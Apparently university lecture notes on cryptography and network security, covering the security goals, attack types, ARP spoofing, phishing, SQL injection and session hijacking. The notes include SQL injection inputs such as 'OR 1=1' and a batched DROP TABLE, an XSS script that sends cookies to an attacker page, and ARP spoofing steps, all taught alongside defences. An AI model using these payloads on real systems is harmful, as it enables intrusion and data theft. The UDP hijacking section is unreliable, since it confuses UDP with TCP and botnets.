Cryptography & Network Security Dept of CSE

Cryptography & Network Security

By

P.V.VIJAYA DURGA
Dept of
CSE

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

UNIT- I Basic Principles: Security Goals, Cryptographic Attacks, Services and

Mechanisms, Mathematics of Cryptography.

INTRODUCTION:

Computer data often travels from one computer to another, leaving the safety
of its protected physical surroundings. Once the data is out of hand, people
with bad intention could modify or forget your data, either for amusement or
for their own benefit. Cryptography can reformat and transform our data,
making it safer on its trip between computers. The technology is based on the
essentials of secret codes, augmented by modern mathematics that protects
our data in powerful ways.

• Computer Security - generic name for the collection of tools designed to

protect data and to thwart hackers

• Network Security - measures to protect data during their transmission

• Internet Security - measures to protect data during their transmission over a

collection of interconnected networks.

Cryptography: Cryptography ensures that the information that is sent safely

and securely, preserves the concept of confidentiality, integrity, and
authenticity. Having seen, the basics of cryptography and the different types of
encryption, let us next view the different types of attacks that are possible.

The text that is to be transmitted which can be commonly read is known as

‘plaintext’.

This plaintext is converted to unreadable format by the process of encryption

and it is then known as ‘Ciphertext’.

This ciphertext can now be transmitted over insecure channels confidently

without the danger of snooping. Once it has been successfully transmitted, it
has to be decrypted at the receiver’s end and the ‘plaintext’ is again recovered.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

An algorithm is a complex mathematical formula that aids in encrypting the

information along with the “key”.

The “key” is a long sequence of bits which is used to encrypt and decrypt the
text.

This is the basic and fundamental concept behind cryptography. There are two
modes of encryption – the symmetric encryption and asymmetric encryption.
In ‘Symmetric encryption’ algorithms, the same key which is used to
encrypt is used to decrypt a message.
In ‘Asymmetric encryption’ algorithms, different keys are used to encrypt and

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

Security Goals:

The objective of Cyber security is to protect information from being stolen,

compromised or attacked. Cyber security can be measured by at least one of
three goals-

• Confidentiality

• Integrity

• Availability

These three pillars of Network Security are often represented as CIA Triangle,
as shown below.

1.Confidentiality:

The first goal of Network Security is "Confidentiality". The function of

"Confidentiality" is in protecting precious business data (in storage or in
motion) from unauthorized persons. Confidentiality part of Network Security
makes sure that the data is available OLNY to intended and authorized
persons. Access to business data should be only for those individuals who are
permitted to use that data.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

Tools for Confidentiality:

Encryption: It is a method of transforming

information to make it unreadable for
unauthorized users by using an algorithm. The
transformation of data uses a secret key (an
encryption key) so that the transformed data
can only be read by using another secret key
(decryption key). It protects sensitive data such
as credit card numbers by encoding and
transforming data into unreadable cipher text.
This encrypted data can only be read by
decrypting it. Asymmetric-key and symmetric-
key are the two primary types of encryption.

Access control: It defines rules and policies for limiting access to a system or
to physical or virtual resources. It is a process by which users are granted
access and certain privileges to systems, resources or information. In access
control systems, users need to present credentials before they can be
granted access such as a person's name or a computer's serial number.

Authentication: It is a process that ensures and confirms a user's identity

or role that someone has. It can be done in a number of different ways, but it
is usually based on a combination of-something the person has (like a smart
card or a radio key for storing secret keys),something the person knows (like a
password),something the person is (like a human with a fingerprint).

Authentication is the necessity of every organizations because it enables

organizations to keep their networks secure by permitting only authenticated
users to access its protected

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

resources. These resources may include computer systems, networks,

databases, websites and other network-based applications or services.

Authorization: It is a security mechanism which gives permission to do or have

something. It is used to determine a person or system is allowed access to
resources, based on an access control policy, including computer programs,
files, services, data and application features. It is normally preceded by
authentication for user identity verification. System administrators are typically
assigned permission levels covering all system and user resources. During
authorization, a system verifies an authenticated user's access rules and either
grants or refuses resource access.

Physical security: It describes measures designed to deny the unauthorized

access of IT assets like facilities, equipment, personnel, resources and other
properties from damage. It protects these assets from physical threats
including theft, vandalism, fire and natural disasters.

2. Integrity

The second goal of Network Security is "Integrity". Integrity aims at

maintaining and assuring the accuracy and consistency of data. The function of
Integrity is to make sure that the date is accurate and reliable and is not
changed by unauthorized persons or hackers. The data received by the
recipient must be exactly same as the data sent from the sender, without
change in even single bit of data.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

Tools for Integrity:

Backup: It is the periodic archiving of data. It is a process of making copies of

data or data files to use in the event when the original data or data files are
lost or destroyed. It is also used to make copies for historical purposes, such as
for longitudinal studies, statistics or for historical records or to meet the
requirements of a data retention policy. Many applications especially in a
Windows environment, produce backup files using the .BAK file extension.

Checksum: It is a numerical value used to verify the integrity of a file or a

data transfer. In other words, it is the computation of a function that maps the
contents of a file to a numerical value. They are typically used to compare two
sets of data to make sure that they are the same. A checksum function
depends on the entire contents of a file. It is designed in a way that even a
small change to the input file (such as flipping a single bit) likely to results in
different output value.

Data Correcting Codes: It is a method for storing data in such a way that small
changes can be easily detected and automatically corrected.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

3. Availability
Availability is the property in which information is accessible and modifiable in
a timely fashion by those authorized to do so. It is the guarantee of reliable and
constant access to our sensitive data by authorized people.

Tools for Availability:

Physical Protections

Computational Redundancies

Physical Protections:
Physical safeguard means to keep information available even in the event of
physical challenges. It ensure sensitive information and critical information
technology are housed in secure areas.

Computational redundancies:
It is applied as fault tolerant against accidental faults. It protects computers
and storage devices that serve as fallbacks in the case of failures.

Cryptographic Attacks:

The basic intention of an attacker is to break a cryptosystem and to find the

plaintext from the ciphertext. To obtain the plaintext, the attacker only needs
to find out the secret decryption key, as the algorithm is already in public
domain.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

Security attacks:

1.Based on information:

There are different types of security attacks which affect the communication
process in the network and they are as follows

Interruption: This type of attack is due to the obstruction of any kind during
the communication process between one or more systems. So the systems
which are used become unusable after this attack by the unauthorized users
which results in the wastage of systems.

Examples: Overloading a server host so that it cannot respond, Cutting a

communication line.

Interception: The phenomenon of confidentiality plays an important role in

this type of attack. The data or message which is sent by the sender is
intercepted by an unauthorized individual where the message will be changed
to the different form or it will be used by the individual for his malicious

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE
process. So the confidentiality of the message is lost in this type of attack.

Examples: Wiretapping telecommunications networks,Illicit copying of files or

programs.

Modification: As the name indicates the message which is sent by the sender is
modified and sent to the destination by an unauthorized user. The integrity of
the message is lost by this type of attack. The receiver cannot receive the exact
message which is sent by the source which results in the poor performance of
the network.

Examples: Modifying the contents of messages in the network,Changing

information stored in data files.

Fabrication: In this type of attack a fake message is inserted into the network
by an unauthorized user as if it is a valid user. This results in the loss of
confidentiality, authenticity and integrity of the message.

Examples: Inserting messages into the network using the identity of another
individual, Replaying previously intercepted messages, Spoofing a web site or
other network service.

II) Based on the action performed by attacker

Attacks are typically categorized based on the action performed by the

attacker. An attack, thus, can be passive or active.

Active attacks: An Active attack attempts to alter system resources or effect

their operations. Active attack involve some modification of the data stream or
creation of false statement. Types of active attacks are as following:

i)Masquerade
Masquerade attack takes place when one entity pretends to be different
entity. A Masquerade attack involves one of the other form of active attacks.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

II)ModificationofMessages
It means that some portion of a message is altered or that message is delayed
or reordered to produce an unauthorised effect. For example, a message
meaning “Allow JOHN to read confidential file X” is modified as “Allow Smith to
read confidential file X”.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

III)Repudiation
This attack is done by either sender or receiver. The sender or receiver can
deny later that he/she has send or receive a message. For example, customer
ask his Bank “To transfer an amount to someone” and later on the
sender(customer) deny that he had made such a request. This is repudiation.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

iv) Replay –
It involves the passive capture of a message and its subsequent the
transmission to produce an authorized effect.

v) DenialofService :
It prevents normal use of communication facilities. This attack may have a
specific target. For example, an entity may suppress all messages directed to a
particular destination. Another form of service denial is the disruption of an
entire network wither by disabling the network or by overloading it by
messages so as to degrade performance.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

Passive attacks: A Passive attack attempts to learn or make use of information

from the system but does not affect system resources. Passive Attacks are
in the nature of eavesdropping on or monitoring of transmission. The goal of
the opponent is to obtain information is being transmitted. Types of Passive
attacks are as following:

1. The release of message content :

Telephonic conversation, an electronic mail message or a transferred file
may contain sensitive or confidential information. We would like to
prevent an opponent from learning the contents of these transmissions.

Traffic analysis :
Suppose that we had a way of masking (encryption) of information, so that
the attacker even if captured the message could not extract any information
from the message.

The opponent could determine the location and identity of communicating

host and could observe the frequency and length of messages being
exchanged. This information might be useful in guessing the nature of the
communication that was taking place.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE
.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

ARP ATTACK:

Address Resolution Protocol (ARP):

Address Resolution Protocol (ARP) spoofing or ARP poisoning is a form
of spoofing attack that hackers use to intercept data. A hacker commits an ARP
spoofing attack by tricking one device into sending messages to the hacker
instead of the intended recipient. This way, the hacker gains access to your
device’s communications, including sensitive data such as passwords and credit
card information.

The ARP Protocol and ARP Spoofing:

ARP spoofing occurs on a local area network (LAN) using an ARP. An ARP is a
communication protocol connecting a dynamic internet protocol (IP) address to
a physical machine address. The latter is referred to as a media access control
(MAC) address. The ARP protocol directs the communication on the LAN.

Each network device has both an IP address and a MAC address. To send and
receive messages, hosts on a network must know the addresses of the others on
that network. In doing so, a host will connect a (typically dynamic IP address to
a physical MAC address).

For example, Host A on a computer network wants to connect its IP address to

the MAC address of Host B. Therefore, it sends an ARP request to all the other
hosts on the LAN. Following this request, it receives an ARP response from Host
B, with its MAC address. The requesting host then stores this address on its ARP
cache, which is similar to a contacts list. This cache is sometimes referred to as
an ARP table, as the addresses are stored in the form of a table.

ARP spoofing refers to an attacker with access to the LAN pretending to be Host
B. The attacker sends messages to Host A with the goal of tricking Host A into
saving the attacker’s address as Host B’s address. Host A will ultimately send
communications intended for Host B to the attacker instead. Once the attacker
becomes this middle man, each time Host A communicates with Host B, that
host will in fact be communicating first with the attacker. Host B will typically be
the default gateway, or the router.

What is ARP Spoofing (ARP Poisoning)

An ARP spoofing, also known as ARP poisoning, is a Man in the

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga
 Cryptography & Network Security Dept of CSE
Middle (MitM) attack that allows attackers to intercept communication between
network devices. The attack works as follows:

1. The attacker must have access to the network. They scan the network to
determine the IP addresses of at least two devices—let’s say these are a
workstation and a router.
2. The attacker uses a spoofing tool, such as Arpspoof or Driftnet, to send out
forged ARP responses.
3. The forged responses advertise that the correct MAC address for both IP
addresses, belonging to the router and workstation, is the attacker’s MAC
address. This fools both router and workstation to connect to the attacker’s
machine, instead of to each other.
4. The two devices update their ARP cache entries and from that point onwards,
communicate with the attacker instead of directly with each other.
5. The attacker is now secretly in the middle of all communications

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

Types of ARP Spoofing:

 Man-in-the-Middle: In the Man-in-the-Middle Attack, hackers use ARP

spoofing to intercept communications that occur between devices on a
network to steal information that is transmitted between devices. Sometimes,
hackers also use man-in-the-middle to modify traffic between network devices.
 Session hijacking: In Session hijacking, With the help of ARP spoofing hackers
are able to easily extract the session ID or gain inauthentic access to the
victim’s private systems and data.
 Denial-of-service attacks: Denial-of-service attack is a type of attack in which
one or more victims deny to access the network. With the help of ARP
spoofing, A single target victim’s mac address is linked with multiple IP
addresses. Due to this whole traffic is shifted toward the target victim’s mac
address which causes overloading of the network of the target victim with
traffic.

How to Detect an ARP Cache Poisoning Attack:

Here is a simple way to detect that a specific device’s ARP cache has been poisoned,
using the command line. Start an operating system shell as an administrator. Use
the following command to display the ARP table, on both Windows and Linux:

arp -a

The output will look something like this:

Internet Address Physical Address

192.168.5.1 00-14-22-01-23-45

192.168.5.201 40-d4-48-cr-55-b8

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE
192.168.5.202 00-14-22-01-23-45

If the table contains two different IP addresses that have the same MAC address,
this indicates an ARP attack is taking place. Because the IP address 192.168.5.1 can
be recognized as the router, the attacker’s IP is probably 192.168.5.202.

To discover ARP spoofing in a large network and get more information about the
type of communication the attacker is carrying out, you can use the open source
Wireshark protocol.

ARP Spoofing Prevention:

Here are a few best practices that can help you prevent ARP Spoofing on your
network:

 Use a Virtual Private Network (VPN)—a VPN allows devices to connect to the
Internet through an encrypted tunnel. This makes all communication encrypted,
and worthless for an ARP spoofing attacker.
 Use static ARP—the ARP protocol lets you define a static ARP entry for an IP
address, and prevent devices from listening on ARP responses for that address. For
example, if a workstation always connects to the same router, you can define a
static ARP entry for that router, preventing an attack.
 Use packet filtering—packet filtering solutions can identify poisoned ARP packets
by seeing that they contain conflicting source information, and stop them before
they reach devices on your network.
 Run a spoofing attack—check if your existing defenses are working by mounting a
spoofing attack, in coordination with IT and security teams. If the attack succeeds,
identify weak points in your defensive measures and remediate them.

Phishing Attack:

Phishing attacks are the practice of sending fraudulent communications that appear
to come from a reputable source. It is usually done through email. The goal is to
steal sensitive data like credit card and login information, or to install malware on
the victim’s machine.
In a typical phishing scam, a hacker pretends to be someone the victim trusts, like a
colleague, boss, authority figure or representative of a well-known brand. The

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE
hacker sends a message directing the victim to pay an invoice, open an attachment,
click a link or take some other action.
Because they trust the supposed source of the message, the user follows the
instructions and falls right into the scammer's trap. That "invoice" might lead
directly to a hacker's account. That attachment might install ransomware on the
user's device. That link might take the user to a website that steals credit card
numbers, bank account numbers, login credentials or other personal data.

Phishing attack examples

The following illustrates a common phishing scam attempt:

 A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many

faculty members as possible.
 The email claims that the user’s password is about to expire. Instructions are given
to go to myuniversity.edu/renewal to renew their password within 24 hours.

Several things can occur by clicking the link. For example:

 The user is redirected to myuniversity.edurenewal.com, a bogus page appearing

exactly like the real renewal page, where both new and existing passwords are
requested. The attacker, monitoring the page, hijacks the original password to gain
access to secured areas on the university network.
 The user is sent to the actual password renewal page. However, while being
redirected, a malicious script activates in the background to hijack the user’s
session cookie. This results in a reflected XSS attack, giving the perpetrator
privileged access to the university network.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE
Different Types of Phishing Attacks:

1.Spear phishing:

Spear phishing involves targeting a specific individual in an organization to try to

steal their login credentials. The attacker often first gathers information about the
person before starting the attack, such as their name, position, and contact details.

2. Vishing:

Vishing, which is short for "voice phishing," is when someone uses the phone to try
to steal information. The attacker may pretend to be a trusted friend or relative or
to represent them.

3. Email phishing
In an email phishing scam, the attacker sends an email that looks legitimate,
designed to trick the recipient into entering information in reply or on a site that
the hacker can use to steal or sell their data.

4.HTTPS phishing
An HTTPS phishing attack is carried out by sending the victim an email with a link to
a fake website. The site may then be used to fool the victim into entering their
private information.

5. Pharming
In a pharming attack, the victim gets malicious code installed on their computer.
This code then sends the victim to a fake website designed to gather their login
credentials.

6.Whaling
A whaling attack is a phishing attack that targets a senior executive(CEO). These
individuals often have deep access to sensitive areas of the network, so a successful
attack can result in access to valuable info.

7.Man-in-the-middle (MiTM) attacks

With a man-in-the-middle attack, the hacker gets in “the middle” of two parties
and tries to steal information exchanged between them, such as account
credentials.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

How to prevent phishing attacks:

 Evaluate emails for suspicious elements. Email headers may reveal

deceptively-worded sender names or email addresses, while the body may
include attachments and links that camouflage malicious code. Users
should err on the side of caution when opening a message from an
unfamiliar sender.

 Do not share personal information. Even when communicating with a

trusted individual, personal information — e.g. Social Security numbers,
bank information, passwords, etc. — should never be exchanged in the
body of an email.

 Block spam. Most email clients come with built-in spam filters, but third-
party filtering services can give users more granular control over their
email. Other recommendations for avoiding email spam include
unsubscribing from mailing lists, refusing to open spam emails, and
keeping email addresses private (i.e. not listing them on an organization’s
external-facing website).

 Use email security protocols. Email authentication methods like SPF,

DKIM, and DMARC records help verify the source of an email. Domain
owners can configure these records to make it difficult for attackers to
impersonate their domains in a domain spoofing attack.

 Run a browser isolation service. Browser isolation services isolate and

execute browser code in the cloud, protecting users from triggering
malware attachments and links that may be delivered through a web-
based email client.

 Filter harmful traffic with a secure web gateway. A secure web gateway
(SWG) inspects data and network traffic for known malware, then blocks
incoming requests according to predetermined security policies.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE
SQL Injection:

What is SQL Injection?

 SQLi or SQL Injection is a web page vulnerability that lets an attacker make
queries with the database.
 Attackers take advantage of web application vulnerability and inject an SQL
command via the input from users to the application.
 Attackers can SQL queries like SELECT to retrieve confidential information
which otherwise wouldn’t be visible.
 SQL injection also lets the attacker to perform a denial-of-service (DoS)
attacks by overloading the server requests.

What is the impact of a successful SQL injection attack?

 A successful SQL injection attack can have severe consequences, including
unauthorized access to sensitive data, such as personal information and
financial records.
 Attackers may manipulate or delete critical data, compromising its integrity
and causing operational disruptions.
 They can also bypass authentication mechanisms, gaining unauthorized
access to user accounts, including administrative privileges.
 This can lead to the exposure of confidential information, identity theft, and
significant financial losses.
 Additionally, SQL injection attacks can result in service downtime and damage
to the organization’s reputation.
How to Detect SQL injection Vulnerabilities?
 To detect SQL injection vulnerabilities, you can start by performing input
validation testing, where special characters like ' or " are inserted into inputs
to see if they cause errors.
Vishnu Institute of Technology Mrs P. V. Vijaya DUrga
 Cryptography & Network Security Dept of CSE
 Automated tools like SQLMap or Burp Suite can scan for vulnerabilities by
simulating attacks.
 Reviewing the source code helps identify insecure practices, such as using
dynamic SQL queries without proper parameterization.
 Monitoring for unexpected database error messages can reveal potential
issues.
 Finally, conducting thorough penetration testing, including both black-box
and white-box methods, provides a comprehensive assessment of security
weaknesses.
Use of SQL Injection in Web Applications
 Web servers communicate with database servers anytime they need to
retrieve or store user data.
 SQL statements by the attacker are designed so that they can be executed
while the web server is fetching content from the application server.
1. SQL in Web Pages
 SQL injection typically occurs when you ask a user for input, such as their
username/user ID and instead of their name/ID, the user inputs an SQL
statement that will be executed without the knowledge about your database.
For example,
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users
WHERE UserId = " + txtUserId;
The above code is constructing an SQL query by directly concatenating a user
input (txtUserId) into the query string. Attackers can easily exploit this by giving
an input that is always true, like x=x,1=1, etc.
If the attacker gave input as ” 105 OR 1=1 ” in the UserId field, the resulting SQL
will be:
SELECT * FROM Users WHERE UserId = 105 OR 1=1;
This resulting query will return data of all users, not just the user with UserId
=”105″.
Example of SQL Injection
For a better understanding of how attackers do a SQL injection attack, let’s
learn how to do an SQL injection attack ourselves. In this example, we will
perform a basic SQL injection attack and learn the process behind it.
Suppose we have an application based on student records. Any student can view
only his or her records by entering a unique and private student ID.
Suppose we have a field like the one below:
Student id: The student enters the following in the input field: 12222345 or 1=1.
Query:

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE
SELECT * FROM STUDENT WHERE
STUDENT-ID == 12222345 or 1 = 1
SQL Injection based on 1=1 is always true. As you can see in the above
example, 1=1 will return all records for which this holds true. So basically, all the
student data is compromised. Now the malicious user can also similarly use other
SQL queries.
Consider the following SQL query.
Query 1:
SELECT * FROM USER WHERE
USERNAME = “” AND PASSWORD=””
Now the malicious attacker can use the ‘=’ operator cleverly to retrieve private
and secure user information. So following query when executed retrieves
protected data, not intended to be shown to users.
Query 2:
SELECT* FROM User WHERE
(Username = “” OR 1=1) AND
(Password=”” OR 1=1).
Since 1=1 always holds true, user data is compromised.
SQL Injection Types
There are different types of SQL injection attacks:
1. In-band SQL Injection
 It involves sending malicious SQL queries directly through the web
application’s interface.
 It allows attackers to extract sensitive information or modify the database
itself.
2. Error-based SQL Injection
 Attackers exploit error messages generated by the web application by
analyzing error messages to gain access to confidential data or modify the
database.
3. Blind SQL Injection
 Attackers send malicious SQL queries and observe the application’s response.
 By analyzing the application’s behavior, attackers can determine the success
of the query.
4. Out-of-band SQL Injection
 Uses a different channel to communicate with the database.
 Allows attackers to exfiltrate sensitive data from the database.
5. Inference-based SQL Injection
 Uses statistical inference to gain access to confidential data.
 Attackers create queries that return the same result regardless of input
values.
Vishnu Institute of Technology Mrs P. V. Vijaya DUrga
 Cryptography & Network Security Dept of CSE
Impact of SQL Injection
 The hacker can retrieve all the user data present in the database such as user
details, credit card information, and social security numbers, and can also
gain access to protected areas like the administrator portal.
 It is also possible to delete user data from the tables.
Nowadays, all online shopping applications and bank transactions use back-end
database servers. So in case the hacker is able to exploit SQL injection, the entire
server is compromised.
SQL Injection Prevention
Developers can use the following prevention measures to prevent SQL injection
attacks.
 User Authentication: Validating input from the user by pre-defining length,
type of input, of the input field and authenticating the user.
 Restricting access privileges of users and defining how much amount of data
any outsider can access from the database. Basically, users should not be
granted permission to access everything in the database.
 Do not use system administrator accounts.
For more details, refer to How to Protect Against SQL Injection Attacks article.
SQL Injection Based on Batched SQL Statements
1. Most databases guide batch SQL statements.
2. A batch of SQL statements is a collection of two or more square statements
separated using semicolons.
The SQL declaration underneath will return all rows from the “users” desk after
which delete the “Employees ” table.
Query:
SELECT * FROM Users;
DROP TABLE Employees;
Look at the following example:
Syntax:
txtEmpId = getRequestString("EmpId");
txtSQL = "SELECT * FROM Users WHERE EmpId = " + txtEmpId;
The valid SQL statement would look like this:
Query:
SELECT * FROM Users WHERE EmpId = 116;
DROP TABLE Employees;

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE

Security services:
Security services include authentication, access control, data confidentiality, data
integrity,nonrepudiation, and availability.

1.
DATA CONFIDENTIALITY: The protection of data from unauthorized
disclosure.

a. Connection Confidentiality: The protection of all user data on a connection.

b. Connectionless Confidentiality: The protection of all user data in a single data

block

c.Selective-Field Confidentiality: The confidentiality of selected fields within

the user data on a connection or in a single data block.

d.Traffic Flow Confidentiality: The protection of the information that might

be derived from observation of traffic flows.

2.
AUTHENTICATION: The assurance that the communicating entity is the one
that it claims to be.

a. Peer Entity Authentication: Provide confidence in the identity of the entities

connected.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

Cryptography & Network Security Dept of CSE
b.Data Origin Authentication: In a connectionless transfer, provides
assurance that the source of received data is as claimed.

3.
ACCESS CONTROL: The prevention of unauthorized use of a resource
(i.e., this service controls who can have access to which resource.)

4.
DATA INTEGRITY: The assurance that data received are exactly as sent by
an authorized entity (i.e., contain no modification, insertion, deletion, or
replay).

a.Connection Integrity with Recovery: Provides for the integrity of all user
data on a connection and detects any modification, insertion, deletion, or
replay of any data within an entire data sequence, with recovery attempted.

b. Connection Integrity without Recovery: As above, but provides only detection

without recovery.

c. Selective-Field Connection Integrity: Provides for the integrity of selected

fields within the user data of a data block transferred over a connection.

d. Connectionless Integrity: Provides for the integrity of a single connectionless

data block.

e.Selective-Field Connectionless Integrity: Provides for the integrity of

selected fields within a single connectionless data block; takes the form of
determination of whether the selected fields have been modified.

5.
NONREPUDIATION: Provides protection against denial by one of the entities
involved in a communication of having participated in all or part of the
communication.

a. Nonrepudiation, Origin: Proof that the message was sent by the specified
party.
b. Nonrepudiation, Destination: Proof that the message was received by the
specified party.
Vishnu Institute of Technology Mrs P. V. Vijaya DUrga
 Cryptography & Network Security Dept of CSE

Security mechanisms:

A security mechanism is any process (or a device incorporating such a

process) that is designed to detect,prevent,or recover from a security attack.

Examples of mechanisms are encryption

algorithms, digital signatures, and authentication protocols.

Mrs P. V. Vijay
Cryptography & Network Security Dept of CSE

1.Encipherment: Hiding or covering of data by using some mathematical

transformations is called encipherment. (or) The use of mathematical
algorithms to transform data into a form that is not readily intelligible.

2. Data integrity: A variety of mechanisms used to assure the integrity of a

data unit or stream of data units. (or) Techniques used to protect data from
unauthorized alteration.

3. Digital Signature: Technique through which sender can sign a document

electronically and receiver can verify the signature electronically. (Receiver
can verify the authenticity of sender).

4. Authentication Exchange: Sender and receiver can exchange some

messages to prove their identity to each other.

5. Traffic padding: Inserting some dummy information between original

information to confuse and frustrate the intruder.

6. Notarization: Selecting a third party to control the communication between

sender and receiver. (Third party will act as a proof of communication between
sender and receiver).

7. Routing Control: Sending the data to receiver through different available

round rather than using single channel of communication. So, that to confuse
intruder to focus on particular channel.

8.Access control: A variety of mechanisms that enforce access rights to users

on resources. Like PIN, Passwords OTP etc.. Relation between Security services
and Mechanism

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

TCP SESSION HIJACKING:

TCP session hijacking is a security attack on a user session over a protected

network. The most common method of session hijacking is called IP spoofing,
when an attacker uses source-routed IP packets to insert commands into an
active communication between two nodes on a network and disguise itself as one
of the authenticated users. This type of attack is possible because authentication
typically is only done at the start of a TCP session.
Another type of session hijacking is known as a man-in-the-middle attack, where
the attacker, using a sniffer, can observe the communication between devices
and collect the data that is transmitted.
Different ways of session hijacking :
There are many ways to do Session Hijacking. Some of them are given below –

o Using Packet Sniffers

In the above figure, it can be seen that attack captures the victim’s
session ID to gain access to the server by using some packet sniffers.
o Cross Site Scripting(XSS Attack)
Attacker can also capture victim’s Session ID using XSS attack by using
Vishnu Institute of Technology Mrs P. V. Vijaya DUrga
Cryptography & Network Security Dept of CSE
javascript. If an attacker sends a crafted link to the victim with the
malicious JavaScript, when the victim clicks on the link, the JavaScript
will run and complete the instructions made by the attacker.

<SCRIPT type="text/javascript">

var adr = '../attacker.php?victim_cookie=' +

escape(document.cookie);

</SCRIPT>

o
o IPSpoofing
Spoofing is pretending to be someone else. This is a technique used to
gain unauthorized access to the computer with an IP address of a
trusted host. In implementing this technique, attacker has to obtain the
IP address of the client and inject his own packets spoofed with the IP
address of client into the TCP session, so as to fool the server that it is
communicating with the victim i.e. the original host.
o BlindAttack
If attacker is not able to sniff packets and guess the correct sequence
number expected by server, brute force combinations of sequence
number can be tried.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE

Types of Session Hijacking:

Session Hijacking is of Three types:
1. Active Session Hijacking : An Active Session Hijacking occurs when the
attacker takes control over the active session. The actual user of the network
becomes in offline mode, and the attacker acts as the authorized user. They
can also take control over the communication between the client and the
server. To cause an interrupt in the communication between client and
server, the attackers send massive traffic to attack a valid session and cause
a denial of service attack(DoS).
2. Passive Session Hijacking : In Passive Session Hijacking, instead of controlling
the overall session of a network of targeted user, the attacker monitors the
communication between a user and a server. The main motive of the hacker
is to listen to all the data and record it for the future use. Basically, it steals
the exchanged information and use for irrelevant activity. This is also a kind
of man-in-middle attack (as the attacker is in between the client and the
server exchanging information.
3. Hybrid Hijacking : The combination of Active Session Hijacking and Passive
Session Hijacking is referred to as Hybrid Hijacking. In this the attackers
monitors the communication channel (the network traffic), whenever they
find the issue, they take over the control on the web session and fulfill their
malicious tasks.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

 Cryptography & Network Security Dept of CSE
To perform these all kinds of Session Hijacking attacks, the attackers use various
methods. They have the choice to use a single method or more than one method
simultaneously to perform Session Hijacking. Those methods are:
1. Brute-forcing the Session ID
2. Cross-Site Scripting (XSS) or Misdirected Trust
3. Man-in-the-browser
4. Malware infections
These all Session Hijacking methods can be elaborated as:
1. Brute-forcing the Session ID : As the name suggests, the attack user uses
guessing and trial method to find Session ID depending on its length. This is
due to lack of security and shorter length. The introduction of a strong and
long session key made this method increase in a slow rate.
2. Cross-Site Scripting (XSS) or Misdirected Trust : In Cross-Site-Scripting , the
attacker tries to find out the flaws and the weak point in the web server and
injects its code into that. This activity of the attacker will help the attacker to
find out the Session ID.
3. Man-in-the-browser : Man-in-the-browser uses a Trojan Horse (program that
uses malicious code) to perform its required action. The attacker puts
themselves in the communication channel of a server and a client. The main
purpose of performing this attacks by the attacker is to cause financial fraud.
4. Malware infections : In Malware Infections, attacker can deceive the user to
open a link that is a malware or Trojans program which will install the
malicious software in the device. These are programmed to steal the browser
cookies without the user’s knowledge.

UDP SESSION HIJACKING:

UDS Packet is a low-level transport protocol used on LAN‘s and WAN‘s to send
packets between two endpoints. UDP Session Hijacking is an attack where the
attacker tricks the victim into using their computer as part of a botnet, typically
by sending them unsolicited requests disguised as coming from legitimate
sources. This illegitimate traffic can then be used to exploit vulnerable systems or
steal data. UDP session hijacking is a method of compromising a computer
session by manipulating the session’s Transmission Control Protocol (TCP) traffic.
The attacker manipulates the data sent over the network, which can then be used
to hijack the session or steal information.

There are a number of risks involved with using UDP session hijacking in ethical
hacking. Firstly, UDP packets are not encrypted and are therefore easier to
Vishnu Institute of Technology Mrs P. V. Vijaya DUrga
 Cryptography & Network Security Dept of CSE
capture and manipulate. This makes it easier for the attacker to steal data or
hijack the session. Additionally, the attacker has control over the data being sent,
which means they can tamper with it in a number of ways. This could allow them
to steal information or modify it in order to exploit the system.

UDP Hijacking Attacks:

 One of the most powerful hackers will hijack a UDP broadcast. This allows
them to steal data like passwords and credit cards.
 The attacker, who can be someone nearby or halfway around the world,
accesses the information by sending out a false reply to the victim’s
communications request to an application that uses UDP as its transport
protocol.
 This is possible in Windows XP, Windows Vista, Windows 7, and Windows 8
operating systems.
 UDP packets are accepted by default on most versions of Microsoft operating
system since XP. It is a default setting for anyone using an application on this
operating system. Since these packets are not verified by the operating
system, a hacker can send one reply to another legitimate user’s request.
 This allows the hacker to receive any useful data like passwords and credit
cards from the unsuspecting user. This is dangerous because no one notices
anything unless the session gets degraded or broken because of a lack of
response from the server.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga

